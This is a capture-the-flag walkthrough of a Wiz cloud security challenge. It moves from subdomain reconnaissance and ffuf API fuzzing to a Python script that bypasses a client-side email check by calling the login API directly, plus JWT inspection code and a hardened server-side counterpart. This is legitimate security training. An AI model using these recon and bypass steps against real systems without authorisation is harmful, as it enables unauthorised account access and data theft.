Wiz Cloud Security Championship Challenge 4

Welcome to my walkthrough of the Wiz Cloud Security Championship Challenge 4! This really was a needle in a haystack!

Challenge Overview

The Challenge Setup

🎯 Mission Brief

We have intelligence that one of our developers at Ack-Me Corp is working on a weekend side project, vibe coding an internal knowledge-base chatbot for the company, and that he has put all of our customer records and sensitive data inside it.

Your mission, if you choose to accept it - is to track down the website and obtain the secret flag.

๐Ÿ” Starting Point: Begin by investigating ackme-corp.net online presence and dig deep into their infrastructure. This includes going beyond the scope of the shell.


The environment already contained a number of tools.

Terminal

My Solution Approach

Although a number of tools were included on the box, I decided to first use a few of my go-to sites for checking subdomains and DNS records.

Bingo: checking https://securitytrails.com/ turned up an interesting subdomain for the site, coding.pprod.testing.internal.ackme-corp.net.

Security Trails

Visiting the site, you're met with a login panel with an interesting URL at the bottom: https://www.vibecodeawebsitetoday.com/

Login Panel

I went to that site and had a play around, but none of the functionality worked. I hit a wall for a while, then decided to go back to the terminal and see whether I could find anything about this new site.

ffuf -u https://vibecodeawebsitetoday.com/FUZZ -w /opt/wordlists/api-objects.txt -mc 200 -s

I ran the fuzzer against the API wordlist we had been provided (-mc 200 keeps only paths that answer with HTTP 200, -s suppresses the banner), and it returned the Swagger docs.

Fuzzer Results

We were then able to hit https://vibecodeawebsitetoday.com/docs, which listed all the endpoints for the site.

Swagger

From here I was able to register myself as a user using the app_id that was hardcoded into the /login page:

<div style="display:none" id="app-config" data-app-id="8b91e68a-d900-47b7-ba5e-5fdfe79c258c"></div>
Register User
{
  "status": "success",
  "message": "Registration successful. You can now login with your credentials.",
  "app_id": "8b91e68a-d900-47b7-ba5e-5fdfe79c258c",
  "verified": true,
  "dev_note": "Account auto-verified for immediate access"
}

After this I used the login endpoint on the Swagger page to check that my new user worked as expected; it returned a JWT:

Login
{
  "status": "success",
  "token": "JWT_HERE",
  "message": "Login successful!",
  "app_id": "8b91e68a-d900-47b7-ba5e-5fdfe79c258c"
}
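A check worth doing before using that token, added here as an example and not part of the original write-up: decode the JWT's header and payload (they are only base64url-encoded, so no key is needed) to see the algorithm, the claim names and the expiry, and separately verify the signature, which decoding alone does not do. The token, the HS256 secret and the claims below are constructed for the demo; the real token came from the login endpoint and its contents are not shown on the page.

```python
# Added example: inspect and verify a JWT. Not code from the original post;
# the secret, claims and sample token are constructed for the demo.
import base64
import hashlib
import hmac
import json
import time


def _b64url_decode(segment: str) -> bytes:
    """base64url without padding, as JWS uses it."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def inspect_jwt(token: str) -> dict:
    """Decode header and payload without any key and summarise what a tester
    looks at first: the algorithm, the claim names and whether exp has passed.
    This only reads the token; it does not establish that the token is genuine."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected a three-part JWS compact token")
    header = json.loads(_b64url_decode(parts[0]))
    payload = json.loads(_b64url_decode(parts[1]))
    exp = payload.get("exp")
    return {
        "alg": header.get("alg"),
        "claims": sorted(payload),
        "expired": exp is not None and exp < time.time(),
        "payload": payload,
    }


def verify_hs256(token: str, secret: bytes) -> bool:
    """Recompute the HMAC-SHA256 over header.payload and compare in constant
    time. Only this step shows the token came from the holder of the key."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    if json.loads(_b64url_decode(header_b64)).get("alg") != "HS256":
        return False  # never let the token's own header choose the algorithm
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig_b64))


def make_sample_jwt(secret: bytes, payload: dict) -> str:
    """Constructed HS256 token for the demo; key and claims are invented."""
    header_b64 = _b64url_encode(
        json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload_b64 = _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return f"{header_b64}.{payload_b64}.{_b64url_encode(sig)}"


DEMO_SECRET = b"demo-secret-not-the-real-one"  # assumption: the real key is unknown
SAMPLE_TOKEN = make_sample_jwt(DEMO_SECRET, {
    "sub": "tester@example.net",  # constructed test account
    "app_id": "8b91e68a-d900-47b7-ba5e-5fdfe79c258c",
    "exp": 4102444800,  # 2100-01-01 UTC, so the sample is not expired
})

if __name__ == "__main__":
    print(json.dumps(inspect_jwt(SAMPLE_TOKEN), indent=2))
    print("valid with the right key:", verify_hs256(SAMPLE_TOKEN, DEMO_SECRET))
    print("valid with a wrong key:", verify_hs256(SAMPLE_TOKEN, b"guess"))
```

Paste the real token in place of SAMPLE_TOKEN and call inspect_jwt() on it; the algorithm and claim names tell you what the chat endpoint is likely to trust, and a token that verifies against a guessable secret would be a finding in its own right (nothing on this page says that was the case here).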

I went back to the original site to try my new user but was met with an error, and I could see that no request had gone out. Checking the source, sure enough, the restriction was enforced by client-side validation only:

// Client-side validation: Only allow @ackme-corp.net emails
if (!email.toLowerCase().endsWith('@ackme-corp.net')) {
  showError('Access restricted to Ack-Me Corp employees only (@ackme-corp.net emails)')
  return
}

Sending the request directly to the API with Python requests worked and returned a session token cookie.
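The bypass in code, as an added example and not the original post's script (that one used the requests library; this one uses only the standard library so it runs as-is). It pulls the app_id out of the hidden div shown earlier, builds the login POST that the browser's JavaScript check never sees, and, for contrast, shows the server-side domain check that would actually enforce the rule. The /api/login path, the JSON field names, the session cookie name and the test credentials are assumptions; take the real ones from the Swagger docs.

```python
# Added example, not code from the original write-up. Path, field names,
# cookie name and credentials below are assumptions for the demo.
import json
import urllib.request
from html.parser import HTMLParser

ALLOWED_DOMAIN = "ackme-corp.net"
LOGIN_PATH = "/api/login"  # assumed; read the real path from /docs


class AppIdExtractor(HTMLParser):
    """Pull data-app-id out of the hidden #app-config div on the /login page."""

    def __init__(self):
        super().__init__()
        self.app_id = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "div" and attrs.get("id") == "app-config":
            self.app_id = attrs.get("data-app-id")


def extract_app_id(html: str):
    parser = AppIdExtractor()
    parser.feed(html)
    return parser.app_id


def client_side_check(email: str) -> bool:
    """Mirror of the page's JavaScript rule. Only a browser ever runs it."""
    return email.lower().endswith("@" + ALLOWED_DOMAIN)


def build_login_request(base_url: str, email: str, password: str, app_id: str):
    """The request a script sends straight to the API. Nothing here consults
    client_side_check(), which is the whole point of the bypass."""
    body = json.dumps({"email": email, "password": password, "app_id": app_id}).encode()
    return urllib.request.Request(
        base_url.rstrip("/") + LOGIN_PATH, data=body, method="POST",
        headers={"Content-Type": "application/json"})


def send_and_get_session(req):
    """Send the request and return the session cookie value, if one was set.
    Cookie name 'session' is an assumption."""
    with urllib.request.urlopen(req, timeout=10) as resp:
        for cookie in resp.headers.get_all("Set-Cookie") or []:
            if cookie.startswith("session="):
                return cookie.split(";", 1)[0].split("=", 1)[1]
    return None


def server_side_login(payload: dict, valid_users: dict):
    """What the API should do instead: enforce the domain rule itself, before
    looking at credentials. The domain must match exactly, so an address with
    a second '@' or a look-alike domain is rejected. Returns (status, body)."""
    email = str(payload.get("email", "")).strip().lower()
    local, sep, domain = email.partition("@")
    if not sep or not local or domain != ALLOWED_DOMAIN:
        return 403, {"status": "error", "message": "Ack-Me Corp accounts only"}
    if valid_users.get(email) != payload.get("password"):
        return 401, {"status": "error", "message": "Invalid credentials"}
    return 200, {"status": "success", "message": "Login successful!"}


# Constructed inputs for the demo: the div as shown on the page, and a
# non-corporate test address.
LOGIN_PAGE_HTML = ('<div style="display:none" id="app-config" '
                   'data-app-id="8b91e68a-d900-47b7-ba5e-5fdfe79c258c"></div>')
ATTACKER_EMAIL = "tester@example.net"

if __name__ == "__main__":
    app_id = extract_app_id(LOGIN_PAGE_HTML)
    print("browser check would allow it:", client_side_check(ATTACKER_EMAIL))
    req = build_login_request("https://vibecodeawebsitetoday.com",
                              ATTACKER_EMAIL, "hunter2", app_id)
    print("direct request:", req.get_method(), req.full_url)
    # send_and_get_session(req) would submit it; here we only show what the
    # server should have answered:
    print("hardened server says:", server_side_login(json.loads(req.data), {}))
```

The two checks look similar but are not equivalent: the JavaScript one decides what the page sends, the server one decides what the API accepts, and only the second is a security control. The same rule has to sit in front of registration as well, since the account here was created through the API, not the login page.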

Session Token

I added this to the site using a cookie editor extension, and on revisiting the root of the site I was redirected to /chat.

Cookie Editor

Finally I was able to talk to the chatbot and simply ask it for the flag, which it gladly returned.

Chatbot

Conclusion

And there we have it! This challenge was an excellent demonstration of real-world reconnaissance and web application security testing techniques. The multi-stage approach required a diverse skill set that any penetration tester or bug bounty hunter should have in their arsenal.

Key cybersecurity skills demonstrated:

๐Ÿ” OSINT & Reconnaissance

  • DNS enumeration and subdomain discovery using SecurityTrails
  • Infrastructure mapping and target identification
  • Open source intelligence gathering on corporate assets

๐ŸŒ Web Application Security Testing

  • Directory/endpoint fuzzing with ffuf
  • API discovery and documentation analysis (Swagger)
  • Client-side security control bypass techniques

๐Ÿ› ๏ธ Technical Analysis

  • Source code review for hardcoded credentials and configuration
  • Client-side validation bypass through direct API interaction
  • Reusing an API-issued session token in the browser via a cookie editor

โš–๏ธ Security Implications This challenge highlighted several critical security issues commonly found in real-world applications:

  • Client-side-only validation - the email-domain rule lived in browser JavaScript, so any request sent directly to the API skipped it. Never trust the frontend
  • Information disclosure - a hardcoded app_id in the /login page source, and API documentation (Swagger) exposed on a related public site
  • Open registration - anyone holding the app_id could create an account, and the dev_note in the response shows accounts were auto-verified with no email check
  • Insufficient access controls on sensitive chatbot functionality - once authenticated, a single question returned the flag

The progression from OSINT to technical exploitation mirrors real penetration testing methodology, making this an excellent learning exercise for anyone looking to improve their offensive security skills!